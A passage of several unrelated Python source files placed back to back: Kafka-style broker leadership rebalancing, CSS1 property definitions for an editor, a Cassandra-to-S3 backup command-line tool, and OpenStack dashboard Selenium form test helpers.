sum(1 for p in topic.partitions if p in self.partitions) def count_preferred_replica(self): """Return number of times broker is set as preferred leader.""" return sum( 1 for partition in self.partitions if partition.leader == self ) def get_preferred_partition(self, broker, sibling_distance): """The preferred partition belongs to the topic with the minimum (also negative) distance between destination and source. :param broker: Destination broker :param sibling_distance: dict {topic: distance} negative distance should mean that destination broker has got less partition of a certain topic than source self. :returns: A partition or None if no eligible partitions are available """ # Only partitions not having replica in broker are valid # Get best fit partition, based on avoiding partition from same topic # and partition with least siblings in destination-broker. eligible_partitions = self.partitions - broker.partitions if eligible_partitions: pref_partition = min( eligible_partitions, key=lambda source_partition: sibling_distance[source_partition.topic], ) return pref_partition else: return None def request_leadership(self, opt_count, skip_brokers, skip_partitions): """Under-balanced broker requests leadership from current leader, on the pretext that it recursively can maintain its leadership count as optimal. :key_terms: leader-balanced: Count of brokers as leader is at least opt-count Algorithm: ========= Step-1: Broker will request leadership from current-leader of partitions it belongs to. Step-2: Current-leaders will grant their leadership if one of these happens:- a) Either they remain leader-balanced. b) Or they will recursively request leadership from other partitions until they are become leader-balanced. If both of these conditions fail, they will revoke their leadership-grant Step-3: If current-broker becomes leader-balanced it will return otherwise it moves ahead with next partition. """ # Possible partitions which can grant leadership to broker owned_partitions = filter( lambda p: self is not p.leader and len(p.replicas) > 1, self.partitions, ) for partition in owned_partitions: # Partition not available to grant leadership when:- # 1. Broker is already under leadership change or # 2. Partition has already granted leadership before if partition.leader in skip_brokers or partition in skip_partitions: continue # Current broker is granted leadership temporarily prev_leader = partition.swap_leader(self) # Partition shouldn't be used again skip_partitions.append(partition) # Continue if prev-leader remains balanced if prev_leader.count_preferred_replica() >= opt_count: # If current broker is leader-balanced return else # request next-partition if self.count_preferred_replica() >= opt_count: return else: continue else: # prev-leader (broker) became unbalanced # Append skip-brokers list so that it is not unbalanced further skip_brokers.append(prev_leader) # Try recursively arrange leadership for prev-leader prev_leader.request_leadership(opt_count, skip_brokers, skip_partitions) # If prev-leader couldn't be leader-balanced # revert its previous grant to current-broker if prev_leader.count_preferred_replica() < opt_count: # Partition can be used again for rebalancing skip_partitions.remove(partition) partition.swap_leader(prev_leader) # Try requesting leadership from next partition continue else: # If prev-leader successfully balanced skip_partitions.append(partition) # Removing from skip-broker list, since it can now again be # used for granting leadership for some other partition skip_brokers.remove(prev_leader) if self.count_preferred_replica() >= opt_count: # Return if current-broker is leader-balanced return else: continue def donate_leadership(self, opt_count, skip_brokers, used_edges): """Over-loaded brokers tries to donate their leadership to one of their followers recursively until they become balanced. :key_terms: used_edges: Represent list of tuple/edges (partition, prev-leader, new-leader), which have already been used for donating leadership from prev-leader to new-leader in same partition before. skip_brokers: This is to avoid using same broker recursively for balancing to prevent loops. :Algorithm: * Over-loaded leader tries to donate its leadership to one of its followers * Follower will be tried to balanced recursively if it becomes over-balanced * If it is successful, over-loaded leader moves to next partition if required, return otherwise. * If it is unsuccessful, it tries for next-follower or next-partition whatever or returns if none available. """ owned_partitions = filter( lambda p: self is p.leader and len(p.replicas) > 1, self.partitions, ) for partition in owned_partitions: # Skip using same partition with broker if already used before potential_new_leaders = filter( lambda f: f not in skip_brokers, partition.followers, ) for follower in potential_new_leaders: # Don't swap the broker-pair if already swapped before # in same partition if (partition, self, follower) in used_edges: continue partition.swap_leader(follower) used_edges.append((partition, follower, self)) # new-leader didn't unbalance if follower.count_preferred_replica() <= opt_count + 1: # over-broker balanced if self.count_preferred_replica() <= opt_count + 1: return else: # Try next-partition, not another follower break else: # new-leader (broker) became over-balanced skip_brokers.append(follower) follower.donate_leadership(opt_count, skip_brokers, used_edges) # new-leader couldn't be balanced, revert if follower.count_preferred_replica() > opt_count + 1: used_edges.append((partition, follower, self)) partition.swap_leader(self) # Try next leader or partition continue else: # New-leader was successfully balanced used_edges.append((partition, follower, self)) # New-leader can be reused skip_brokers.remove(follower) if self.count_preferred_replica() <= opt_count + 1: # Now broker is balanced return else: # Try next-partition, not another follower break def __str__(self): return "{id}".format(id=self._id) def __repr__(self): return "{0}".format(self)
""" CSS 1 definitions. """ import textwrap CSS_PSEUDO_CLASS_NAMES = """first-letter first-line link active visited first-child focus hover lang before after left right first""".split() CSS_ATTR_DICT = { 'background': [ 'bottom', 'center', 'fixed', 'inherit', 'left', 'none', 'no-repeat', 'repeat', 'repeat-x', 'repeat-y', 'rgb(', 'right', 'scroll', 'top', 'transparent', 'url(', '!important', '#', ], 'background-attachment': [ 'fixed', 'inherit', 'scroll', '!important', ], 'background-color': [ 'inherit', 'rgb(', 'transparent', '!important', '#', ], 'background-image': [ 'inherit', 'none', 'url(', '!important', ], 'background-position': [ 'bottom', 'center', 'inherit', 'left', 'right', 'top', '!important', ], 'background-repeat': [ 'inherit', 'no-repeat', 'repeat', 'repeat-x', 'repeat-y', '!important', ], 'border': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'medium', 'none', 'outset', 'rgb(', 'ridge', 'solid', 'thick', 'thin', '!important', '#', ], 'border-bottom': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'medium', 'none', 'outset', 'rgb(', 'ridge', 'solid', 'thick', 'thin', '!important', '#', ], 'border-bottom-width': [ 'inherit', 'medium', 'thick', 'thin', '!important', ], 'border-color': [ 'inherit', 'rgb(', 'transparent', '!important', '#', ], 'border-left': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'medium', 'none', 'outset', 'rgb(', 'ridge', 'solid', 'thick', 'thin', '!important', '#', ], 'border-left-color': [ 'inherit', 'rgb(', '!important', '#', ], 'border-left-style': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'none', 'outset', 'ridge', 'solid', '!important', ], 'border-left-width': [ 'inherit', 'medium', 'thick', 'thin', '!important', ], 'border-right': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'medium', 'none', 'outset', 'rgb(', 'ridge', 'solid', 'thick', 'thin', '!important', '#', ], 'border-right-color': [ 'inherit', 'rgb(', '!important', '#', ], 'border-right-style': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'none', 'outset', 'ridge', 'solid', '!important', ], 'border-right-width': [ 'inherit', 'medium', 'thick', 'thin', '!important', ], 'border-spacing': [ 'inherit', '!important', ], 'border-style': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'none', 'outset', 'ridge', 'solid', '!important', ], 'border-top': [ 'dashed', 'dotted', 'double', 'groove', 'hidden', 'inherit', 'inset', 'medium', 'none', 'outset', 'rgb(', 'ridge', 'solid', 'thick', 'thin', '!important', '#', ], 'border-top-width': [ 'inherit', 'medium', 'thick', 'thin', '!important', ], 'border-width': [ 'inherit', 'medium', 'thick', 'thin', '!important', ], 'clear': [ 'both', 'inherit', 'left', 'none', 'right', '!important', ], 'color': [ 'inherit', 'rgb(', '!important', '#', ], 'display': [ 'block', 'compact', 'inherit', 'inline', 'inline-block', 'inline-table', 'list-item', 'marker', 'none', 'run-in', 'table', 'table-caption', 'table-cell', 'table-column', 'table-column-group', 'table-footer-group', 'table-header-group', 'table-row', 'table-row-group', '!important', ], 'float': [ 'inherit', 'left', 'none', 'right', '!important', ], 'font': [ '100', '200', '300', '400', '500', '600', '700', '800', '900', 'bold', 'bolder', 'caption', 'cursive', 'fantasy', 'icon', 'inherit', 'italic', 'large', 'larger', 'lighter', 'medium', 'menu', 'message-box', 'monospace', 'normal', 'oblique', 'sans-serif', 'serif', 'small', 'smaller', 'small-caps', 'small-caption', 'status-bar', 'xx-large', 'xx-small', 'x-large', 'x-small', '!important', ], 'font-family': [ 'cursive', 'fantasy', 'inherit', 'monospace', 'sans-serif', 'serif', '!important', ], 'font-size': [ 'inherit', 'large', 'larger', 'medium', 'small', 'smaller', 'xx-large', 'xx-small', 'x-large', 'x-small', '!important', ], 'font-size-adjust': [ 'inherit', 'none', '!important', ], 'font-stretch': [ 'condensed', 'expanded', 'extra-condensed', 'extra-expanded', 'inherit', 'narrower', 'normal', 'semi-condensed', 'semi-expanded', 'ultra-condensed', 'ultra-expanded', 'wider', '!important', ], 'font-style': [ 'inherit', 'italic', 'normal', 'oblique', '!important', ], 'font-variant': [ 'inherit', 'normal', 'small-caps', '!important', ], 'font-weight': [ '100', '200', '300', '400', '500', '600', '700', '800', '900', 'bold', 'bolder', 'inherit', 'lighter', 'normal', '!important', ], 'height': [ 'auto', 'inherit', '!important', ], 'letter-spacing': [ 'inherit', 'normal', '!important', ], 'line-height': [ 'inherit', 'normal', '!important', ], 'list-style': [ 'armenian', 'circle', 'cjk-ideographic', 'decimal', 'decimal-leading-zero', 'disc', 'georgian', 'hebrew', 'hiragana', 'hiragana-iroha', 'inherit', 'inside', 'katakana', 'katakana-iroha', 'lower-alpha', 'lower-greek', 'lower-latin', 'lower-roman', 'none', 'outside', 'square', 'upper-alpha', 'upper-latin', 'upper-roman', 'url(', '!important', ], 'list-style-image': [ 'inherit', 'none', 'url(', '!important', ], 'list-style-position': [ 'inherit', 'inside', 'outside', '!important', ], 'list-style-type': [ 'armenian', 'circle', 'cjk-ideographic', 'decimal', 'decimal-leading-zero', 'disc', 'georgian', 'hebrew', 'hiragana', 'hiragana-iroha', 'inherit', 'katakana', 'katakana-iroha', 'lower-alpha', 'lower-greek', 'lower-latin', 'lower-roman', 'none', 'square', 'upper-alpha', 'upper-latin', 'upper-roman', '!important', ], 'margin': [ 'auto', 'inherit', '!important', ], 'margin-bottom': [ 'auto', 'inherit', '!important', ], 'margin-left': [ 'auto', 'inherit', '!important', ], 'margin-right': [ 'auto', 'inherit', '!important', ], 'margin-top': [ 'auto', 'inherit', '!important', ], 'padding': [ 'inherit', '!important', ], 'padding-bottom': [ 'inherit', '!important', ], 'padding-left': [ 'inherit', '!important', ], 'padding-right': [ 'inherit', '!important', ], 'padding-top': [ 'inherit', '!important', ], 'text-align': [ 'center', 'inherit', 'justify', 'left', 'right', '!important', ], 'text-decoration': [ 'blink', 'inherit', 'line-through', 'none', 'overline', 'underline', '!important', ], 'text-indent': [ 'inherit', '!important', ], 'text-transform': [ 'capitalize', 'inherit', 'lowercase', 'none', 'uppercase', '!important', ], 'vertical-align': [ 'baseline', 'bottom', 'inherit', 'middle', 'sub', 'super', 'text-bottom', 'text-top', 'top', '!important', ], 'white-space': [ 'inherit', 'normal', 'nowrap', 'pre', 'pre-wrap', 'pre-line', '!important', ], 'width': [ 'auto', 'inherit', '!important', ], 'word-spacing': [ 'inherit', 'normal', '!important', ], } CSS_PROPERTY_ATTRIBUTE_CALLTIPS_DICT = { 'background' : """Shorthand for setting the individual background properties""", 'background-attachment' : """If background image is specified, this specifies whether it is fixed with regard to the viewport ('fixed') or scrolls along with the document ('scroll').""", 'background-color' : """Sets the background color of an element, either a <color> value or the keyword 'transparent', to make the underlying colors shine through""", 'background-image' : """Sets the background image of an element. When setting a background image, authors should also specify a background color that will be used when the image is unavailable. When the image is available, it is rendered on top of the background color""", 'background-position' : """If a background image has been specified, this property specifies its initial position""", 'background-repeat' : """If a background image is specified, this property specifies whether the image is repeated (tiled), and how""", 'border' : """Shorthand for border-width, border-style and border-color affecting all 4 borders""", 'border-bottom' : """Shorthand for border-width, border-style and border-color affecting the bottom border""", 'border-bottom-width' : """Sets the width of the bottom border of a box""", 'border-color' : """Sets the color of the four borders""", 'border-left' : """Shorthand for border-width, border-style and border-color affecting the left border""", 'border-left-width' : """Sets the width of the left border of a box""", 'border-right' : """Shorthand for border-width, border-style and border-color affecting the right border""", 'border-right-width' : """Sets the width of the right border of a box""", 'border-style' : """Specifies the line style of a box's four borders (solid, double, dashed, hidden, etc.)""", 'border-top' : """Shorthand for border-width, border-style and border-color affecting the top border""", 'border-top-width' : """Sets the width of the top border of a box""", 'border-width' : """Shorthand for setting 'border-top-width', 'border-right-width', 'border-bottom-width', and 'border-left-width' at the same place in the style sheet. If there is only one value, it applies to all sides. If there are two values, the top and bottom borders are set to the first value and the right and left are set to the second. If there are three values, the top is set to the first value, the left and right are set to the second, and the bottom is set to the third. If there are four values, they apply to the top, right, bottom, and left, respectively.""", 'clear' : """Indicates which sides of an element's box(es) may not be adjacent to an earlier floating box""", 'color' : """This property describes the foreground color of an element's text content""", 'display' : """How the element is to be displayed, denotes the box type format""", 'float' : """Specifies whether a box should float to the left, right, or not at all""", 'font' : """Shorthand for setting 'font-style', 'font-variant', 'font-weight', 'font-size', 'line-height', and 'font-family', at the same place in the style sheet""", 'font-family' : """Specifies a prioritized list of font family names and/or generic family names""", 'font-size' : """Describes the size of the font when set solid""", 'font-size-adjust' : """Specifies an aspect value for an element that will preserve the x-height of the first choice font in the substitute font""", 'font-stretch' : """Selects a normal, condensed, or extended face from a font family""", 'font-style' : """Sets normal (sometimes referred to as "roman" or "upright"), italic, and oblique faces within a font family""", 'font-variant' : """Can be used to select font casing 'normal' or 'small-caps'""", 'font-weight' : """Specifies the weight of the font""", 'height' : """Specifies the content height of boxes generated by block-level and replaced elements""", 'letter-spacing' : """Specifies spacing behavior between text characters""", 'line-height' : """Specifies the minimal height of each generated inline box""", 'list-style' : """Shorthand notation for setting the three properties 'list-style-type', 'list-style-image', and 'list-style-position' at the same place in the style sheet""", 'list-style-image' : """Sets the image that will be used as the list item marker""", 'list-style-position' : """Specifies the position of the marker box in the principal block box""", 'list-style-type' : """Specifies appearance of the list item marker if 'list-style-image' has the value 'none' or if the image pointed to by the URI cannot be displayed""", 'margin' : """Shorthand for setting 'margin-top', 'margin-right', 'margin-bottom', and 'margin-left' at the same place in the style sheet""", 'margin-bottom' : """Specifies the width of the bottom margin area of a box""", 'margin-left' : """Specifies the width of the left margin area of a box""", 'margin-right' : """Specifies the width of the right margin area of a box""", 'margin-top' : """Specifies the width of the top margin area of a box""", 'padding' : """Shorthand for setting 'padding-top', 'padding-right', 'padding-bottom', and 'padding-left' at the same place in the style sheet""", 'padding-bottom' : """Sets the bottom width of the containing box""", 'padding-left' : """Sets the left width of the containing box""", 'padding-right' : """Sets the right width of the containing box""", 'padding-top' : """Sets the top width of the containing box""", 'table-layout' : """Specifies the algorithm used to lay out the table cells, rows, and columns""", 'text-align' : """Specifies how inline content of a block is aligned""", 'text-decoration' : """Specifies decorations that are added to the text of an element""", 'text-indent' : """Specifies the indentation of the first line of text in a block""", 'text-transform' : """Specifies capitalization effects of an element's text""", 'uri' : """An internet reference string.""", 'vertical-align' : """Affects the vertical positioning inside a line box of the boxes generated by an inline-level element""", 'white-space' : """Specifies how whitespace inside the element is handled""", 'width' : """Specifies the content width of boxes generated by block-level and replaced elements""", 'word-spacing' : """Specifies spacing behavior between words""", } for property, calltip in CSS_PROPERTY_ATTRIBUTE_CALLTIPS_DICT.items(): CSS_PROPERTY_ATTRIBUTE_CALLTIPS_DICT[ property] = "\n".join(textwrap.wrap(calltip, 40))
from __future__ import (absolute_import, print_function) # From system from collections import defaultdict from fabric.api import env import logging # From package from .snapshotting import (BackupWorker, RestoreWorker, \ Snapshot, SnapshotCollection) from .utils import (add_s3_arguments, get_s3_connection_host) from .utils import base_parser as _base_parser env.use_ssh_config = True def run_backup(args): if args.user: env.user = args.user if args.password: env.password = args.password if args.sshport: env.port = args.sshport env.hosts = args.hosts.split(',') if args.new_snapshot: create_snapshot = True else: existing_snapshot = SnapshotCollection( args.aws_access_key_id, args.aws_secret_access_key, args.s3_base_path, args.s3_bucket_name ).get_snapshot_for( hosts=env.hosts, keyspaces=args.keyspaces, table=args.table ) create_snapshot = existing_snapshot is None worker = BackupWorker( aws_access_key_id=args.aws_access_key_id, aws_secret_access_key=args.aws_secret_access_key, s3_bucket_region=args.s3_bucket_region, s3_ssenc=args.s3_ssenc, s3_connection_host=get_s3_connection_host(args.s3_bucket_region), cassandra_conf_path=args.cassandra_conf_path, nodetool_path=args.nodetool_path, cassandra_bin_dir=args.cassandra_bin_dir, backup_schema=args.backup_schema, buffer_size=args.buffer_size, use_sudo=args.use_sudo, connection_pool_size=args.connection_pool_size, exclude_tables=args.exclude_tables, compress_data=args.compress_data ) if create_snapshot: logging.info("Make a new snapshot") snapshot = Snapshot( base_path=args.s3_base_path, s3_bucket=args.s3_bucket_name, hosts=env.hosts, keyspaces=args.keyspaces, table=args.table ) worker.snapshot(snapshot) else: logging.info("Add incrementals to snapshot {!s}".format( existing_snapshot)) worker.update_snapshot(existing_snapshot) def list_backups(args): snapshots = SnapshotCollection( args.aws_access_key_id, args.aws_secret_access_key, args.s3_base_path, args.s3_bucket_name ) path_snapshots = defaultdict(list) for snapshot in snapshots: base_path = '/'.join(snapshot.base_path.split('/')[:-1]) path_snapshots[base_path].append(snapshot) for path, snapshots in path_snapshots.iteritems(): print("-----------[{!s}]-----------".format(path)) for snapshot in snapshots: print("\t {!r} hosts:{!r} keyspaces:{!r} table:{!r}".format( snapshot, snapshot.hosts, snapshot.keyspaces, snapshot.table)) print("------------------------{}".format('-' * len(path))) def restore_backup(args): snapshots = SnapshotCollection( args.aws_access_key_id, args.aws_secret_access_key, args.s3_base_path, args.s3_bucket_name ) if args.snapshot_name == 'LATEST': snapshot = snapshots.get_latest() else: snapshot = snapshots.get_snapshot_by_name(args.backup_name) worker = RestoreWorker(aws_access_key_id=args.aws_access_key_id, aws_secret_access_key=args.aws_secret_access_key, snapshot=snapshot) if args.hosts: hosts = args.hosts.split(',') else: hosts = snapshot.hosts target_hosts = args.target_hosts.split(',') worker.restore(args.keyspace, args.table, hosts, target_hosts) def main(): base_parser = add_s3_arguments(_base_parser) subparsers = base_parser.add_subparsers( title='subcommands', dest='subcommand' ) subparsers.add_parser('list', help="List existing backups") backup_parser = subparsers.add_parser('backup', help="Create a snapshot") # snapshot / backup arguments backup_parser.add_argument( '--compress-data', default=False, help="Compress data, default False") backup_parser.add_argument( '--exclude-tables', default='', help="Column families you want to skip") backup_parser.add_argument( '--buffer-size', default=64, help="The buffer size (MB) for compress and upload") backup_parser.add_argument( '--hosts', required=True, help="The comma separated list of hosts to snapshot") backup_parser.add_argument( '--keyspaces', default='', help="The keyspaces to backup (omit to backup all)") backup_parser.add_argument( '--table', default='', help="The table (column family) to backup") backup_parser.add_argument( '--cassandra-conf-path', default='/etc/cassandra/conf/', help="cassandra config file path") backup_parser.add_argument( '--nodetool-path', default=None, help="nodetool path") backup_parser.add_argument( '--cassandra-bin-dir', default='/usr/bin', help="cassandra binaries directoryr") backup_parser.add_argument( '--user', help="The ssh user to logging on nodes") backup_parser.add_argument( '--use-sudo', default=False, help="Use sudo to run backup") backup_parser.add_argument( '--sshport', help="The ssh port to use to connect to the nodes") backup_parser.add_argument( '--password', default='', help="User password to connect with hosts") backup_parser.add_argument( '--new-snapshot', action='store_true', help="Create a new snapshot") backup_parser.add_argument( '--backup-schema', action='store_true', help="Backup (thrift) schema of selected keyspaces") backup_parser.add_argument( '--connection-pool-size', default=12, help="Number of simultaneous connections to cassandra nodes") # restore snapshot arguments restore_parser = subparsers.add_parser( 'restore', help="Restores a snapshot") restore_parser.add_argument( '--snapshot-name', default='LATEST', help="The name (date/time) \ of the snapshot (and incrementals) to restore") restore_parser.add_argument( '--keyspace', required=True, help="The keyspace to restore") restore_parser.add_argument( '--table', default='', help="The table (column family) to restore; leave blank for all") restore_parser.add_argument( '--hosts', default='', help="Comma separated list of \ hosts to restore from; leave empty for all") restore_parser.add_argument( '--target-hosts', required=True, help="The comma separated list of hosts to restore into") args = base_parser.parse_args() subcommand = args.subcommand if args.verbose: logging.basicConfig(level=logging.INFO) if subcommand == 'backup': run_backup(args) elif subcommand == 'list': list_backups(args) elif subcommand == 'restore': restore_backup(args) if __name__ == '__main__': main()
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import collections import contextlib import six from selenium.webdriver.common import by import selenium.webdriver.support.ui as Support from openstack_dashboard.test.integration_tests.regions import baseregion from openstack_dashboard.test.integration_tests.regions import menus class FieldFactory(baseregion.BaseRegion): """Factory for creating form field objects.""" FORM_FIELDS_TYPES = set() _element_locator_str_prefix = 'div.form-group' def __init__(self, driver, conf, src_elem=None): super(FieldFactory, self).__init__(driver, conf, src_elem) def fields(self): for field_cls in self.FORM_FIELDS_TYPES: locator = (by.By.CSS_SELECTOR, '%s %s' % (self._element_locator_str_prefix, field_cls._element_locator_str_suffix)) elements = super(FieldFactory, self)._get_elements(*locator) for element in elements: yield field_cls(self.driver, self.conf, element) @classmethod def register_field_cls(cls, field_class, base_classes=None): """Register new field class. Add new field class and remove all base classes from the set of registered classes as they should not be in. """ cls.FORM_FIELDS_TYPES.add(field_class) cls.FORM_FIELDS_TYPES -= set(base_classes) class MetaBaseFormFieldRegion(type): """Register form field class in FieldFactory.""" def __init__(cls, name, bases, dct): FieldFactory.register_field_cls(cls, bases) super(MetaBaseFormFieldRegion, cls).__init__(name, bases, dct) @six.add_metaclass(MetaBaseFormFieldRegion) class BaseFormFieldRegion(baseregion.BaseRegion): """Base class for form fields classes.""" _label_locator = None _element_locator = None @property def label(self): return self._get_element(*self._label_locator) @property def element(self): return self.src_elem @property def name(self): return self.element.get_attribute('name') def is_required(self): classes = self.driver.get_attribute('class') return 'required' in classes def is_displayed(self): return self.element.is_displayed() class CheckBoxMixin(object): @property def label(self): id_attribute = self.element.get_attribute('id') return self.element.find_element( by.By.XPATH, '../..//label[@for="{}"]'.format(id_attribute)) def is_marked(self): return self.element.is_selected() def mark(self): if not self.is_marked(): self.label.click() def unmark(self): if self.is_marked(): self.label.click() class CheckBoxFormFieldRegion(CheckBoxMixin, BaseFormFieldRegion): """Checkbox field.""" _element_locator_str_suffix = 'input[type=checkbox]' class RadioButtonFormFieldRegionNG(BaseFormFieldRegion): _element_locator_str_suffix = '[btn-radio]' @property def name(self): return self.element.get_attribute('name') or \ self.element.get_attribute('id') class ChooseFileFormFieldRegion(BaseFormFieldRegion): """Choose file field.""" _element_locator_str_suffix = 'input[type=file]' def choose(self, path): self.element.send_keys(path) class BaseTextFormFieldRegion(BaseFormFieldRegion): _element_locator = None @property def text(self): return self.element.text or self.element.get_attribute('value') @text.setter def text(self, text): self._fill_field_element(text, self.element) class TextInputFormFieldRegion(BaseTextFormFieldRegion): """Text input box.""" _element_locator_str_suffix = \ 'input[type=text], input[type=None]' class PasswordInputFormFieldRegion(BaseTextFormFieldRegion): """Password text input box.""" _element_locator_str_suffix = 'input[type=password]' class EmailInputFormFieldRegion(BaseTextFormFieldRegion): """Email text input box.""" _element_locator_str_suffix = 'input[type=email]' class TextAreaFormFieldRegion(BaseTextFormFieldRegion): """Multi-line text input box.""" _element_locator_str_suffix = 'textarea' class IntegerFormFieldRegion(BaseFormFieldRegion): """Integer input box.""" _element_locator_str_suffix = 'input[type=number]' @property def value(self): return self.element.get_attribute("value") @value.setter def value(self, value): self._fill_field_element(value, self.element) class SelectFormFieldRegion(BaseFormFieldRegion): """Select box field.""" _element_locator_str_suffix = 'select' def is_displayed(self): return self.element._el.is_displayed() @property def element(self): return Support.Select(self.src_elem) @property def values(self): results = [] for option in self.element.all_selected_options: results.append(option.get_attribute('value')) return results @property def options(self): results = collections.OrderedDict() for option in self.element.options: results[option.get_attribute('value')] = option.text return results @property def name(self): raw_el = self.element._el return raw_el.get_attribute('name') or raw_el.get_attribute('id') @property def text(self): return self.element.first_selected_option.text @text.setter def text(self, text): self.element.select_by_visible_text(text) @property def value(self): return self.element.first_selected_option.get_attribute('value') @value.setter def value(self, value): self.element.select_by_value(value) class BaseFormRegion(baseregion.BaseRegion): """Base class for forms.""" _submit_locator = (by.By.CSS_SELECTOR, '*.btn.btn-primary') _cancel_locator = (by.By.CSS_SELECTOR, '*.btn.cancel') _default_form_locator = (by.By.CSS_SELECTOR, 'div.modal-dialog') _fade_locator = (by.By.CLASS_NAME, 'modal-backdrop') _modal_locator = (by.By.CLASS_NAME, 'modal') def __init__(self, driver, conf, src_elem=None): """In most cases forms can be located through _default_form_locator, so specifying source element can be skipped. """ if src_elem is None: # fake self.src_elem must be set up in order self._get_element work self.src_elem = driver # bind the topmost modal form in a modal stack src_elem = self._get_elements(*self._default_form_locator)[-1] super(BaseFormRegion, self).__init__(driver, conf, src_elem) @property def _submit_element(self): return self._get_element(*self._submit_locator) def submit(self): with self.wait_till_form_disappears(): self._submit_element.click() self.wait_till_spinner_disappears() @property def _cancel_element(self): return self._get_element(*self._cancel_locator) def cancel(self): with self.wait_till_form_disappears(): self._cancel_element.click() self.wait_till_spinner_disappears() @contextlib.contextmanager def wait_till_form_disappears(self): """Wait for opened form will be disappeared after interaction. Form may be opened at page as modal or no (just a part of page). When form is modal, it should wait for form will be disappeared after submit or cancel, because form overlaps other page elements and prevents their manipulation. It should be sure that exactly current opened form is closed, because after modal form another modal form may be opened (for ex. stack page). Even if the form was opened twice, the second time it is another form with another DOM-id, despite of DOM-selector is the same. That's why element ids are used to detect opened form. The idea is very simple: to get modal-element and fade-element ids while form is opened, and after submit/cancel to check that modal-element and fade-element with the same ids are absent. """ with self.waits_disabled(): # form is either modal or no, don't wait old_modal_id = self._get_element_id(*self._modal_locator) old_fade_id = self._get_element_id(*self._fade_locator) yield if not (old_modal_id and old_fade_id): return # form isn't modal, exit def predicate(_): new_modal_id = self._get_element_id(*self._modal_locator) new_fade_id = self._get_element_id(*self._fade_locator) return (old_modal_id != new_modal_id) and \ (old_fade_id != new_fade_id) with self.waits_disabled(): self._wait_until(predicate) class FormRegion(BaseFormRegion): """Standard form.""" _header_locator = (by.By.CSS_SELECTOR, 'div.modal-header > h3') _side_info_locator = (by.By.CSS_SELECTOR, 'div.right') _fields_locator = (by.By.CSS_SELECTOR, 'fieldset') # private methods def __init__(self, driver, conf, src_elem=None, field_mappings=None): super(FormRegion, self).__init__(driver, conf, src_elem) self.field_mappings = self._prepare_mappings(field_mappings) self.wait_till_spinner_disappears() self._init_form_fields() def _prepare_mappings(self, field_mappings): if isinstance(field_mappings, tuple): return {item: item for item in field_mappings} else: return field_mappings # protected methods def _init_form_fields(self): self.fields_src_elem = self._get_element(*self._fields_locator) fields = self._get_form_fields() for accessor_name, accessor_expr in self.field_mappings.items(): if isinstance(accessor_expr, six.string_types): self._dynamic_properties[accessor_name] = fields[accessor_expr] else: # it is a class self._dynamic_properties[accessor_name] = accessor_expr( self.driver, self.conf) def _get_form_fields(self): factory = FieldFactory(self.driver, self.conf, self.fields_src_elem) try: self._turn_off_implicit_wait() return {field.name: field for field in factory.fields()} finally: self._turn_on_implicit_wait() def set_field_values(self, data): """Set fields values data - {field_name: field_value, field_name: field_value ...} """ for field_name in data: field = getattr(self, field_name, None) # Field form does not exist if field is None: raise AttributeError("Unknown form field name.") value = data[field_name] # if None - default value is left in field if value is not None: # all text fields if hasattr(field, "text"): field.text = value # file upload field elif hasattr(field, "path"): field.path = value # integers fields elif hasattr(field, "value"): field.value = value # properties @property def header(self): """Form header.""" return self._get_element(*self._header_locator) @property def sideinfo(self): """Right part of form, usually contains description.""" return self._get_element(*self._side_info_locator) @property def fields(self): """List of all fields that form contains.""" return self._get_form_fields() class TabbedFormRegion(FormRegion): """Forms that are divided with tabs. As example is taken form under the the Project/Network/Networks/Create Network, on initialization form needs to have form field names divided into tuples, that represents the tabs and the fields located under them. Usage: form_field_names = (("network_name", "admin_state"), ("create_subnet", "subnet_name", "network_address", "ip_version", "gateway_ip", "disable_gateway"), ("enable_dhcp", "allocation_pools", "dns_name_servers", "host_routes")) form = TabbedFormRegion(self.conf, self.driver, None, form_field_names) form.network_name.text = "test_network_name" """ _submit_locator = (by.By.CSS_SELECTOR, '*.btn.btn-primary[type=submit]') _side_info_locator = (by.By.CSS_SELECTOR, "td.help_text") def __init__(self, driver, conf, field_mappings=None, default_tab=0): self.current_tab = default_tab super(TabbedFormRegion, self).__init__( driver, conf, field_mappings=field_mappings) def _prepare_mappings(self, field_mappings): return [super(TabbedFormRegion, self)._prepare_mappings(tab_mappings) for tab_mappings in field_mappings] def _init_form_fields(self): self.switch_to(self.current_tab) def _init_tab_fields(self, tab_index): fieldsets = self._get_elements(*self._fields_locator) self.fields_src_elem = fieldsets[tab_index] fields = self._get_form_fields() current_tab_mappings = self.field_mappings[tab_index] for accessor_name, accessor_expr in current_tab_mappings.items(): if isinstance(accessor_expr, six.string_types): self._dynamic_properties[accessor_name] = fields[accessor_expr] else: # it is a class self._dynamic_properties[accessor_name] = accessor_expr( self.driver, self.conf, self.fields_src_elem) def switch_to(self, tab_index=0): self.tabs.switch_to(index=tab_index) self._init_tab_fields(tab_index) @property def tabs(self): return menus.TabbedMenuRegion(self.driver, self.conf, src_elem=self.src_elem) class TabbedFormRegionNG(TabbedFormRegion): """Forms that are divided with vertical tabs. These forms are implemented in angular-js and have transfer-tables as usual field's element. """ _submit_locator = (by.By.CSS_SELECTOR, 'button.btn.btn-primary.finish') _header_locator = (by.By.CSS_SELECTOR, '.modal-header > .h4') _fields_locator = (by.By.CSS_SELECTOR, '.step ng-include[ng-form]') _cancel_locator = (by.By.CSS_SELECTOR, 'button.btn.btn-default.pull-left') @property def tabs(self): return menus.TabbedMenuRegionNG(self.driver, self.conf) class DateFormRegion(BaseFormRegion): """Form that queries data to table that is regularly below the form, typical example is located on Project/Compute/Overview page. """ _from_field_locator = (by.By.CSS_SELECTOR, 'input#id_start') _to_field_locator = (by.By.CSS_SELECTOR, 'input#id_end') @property def from_date(self): return self._get_element(*self._from_field_locator) @property def to_date(self): return self._get_element(*self._to_field_locator) def query(self, start, end): self._set_from_field(start) self._set_to_field(end) 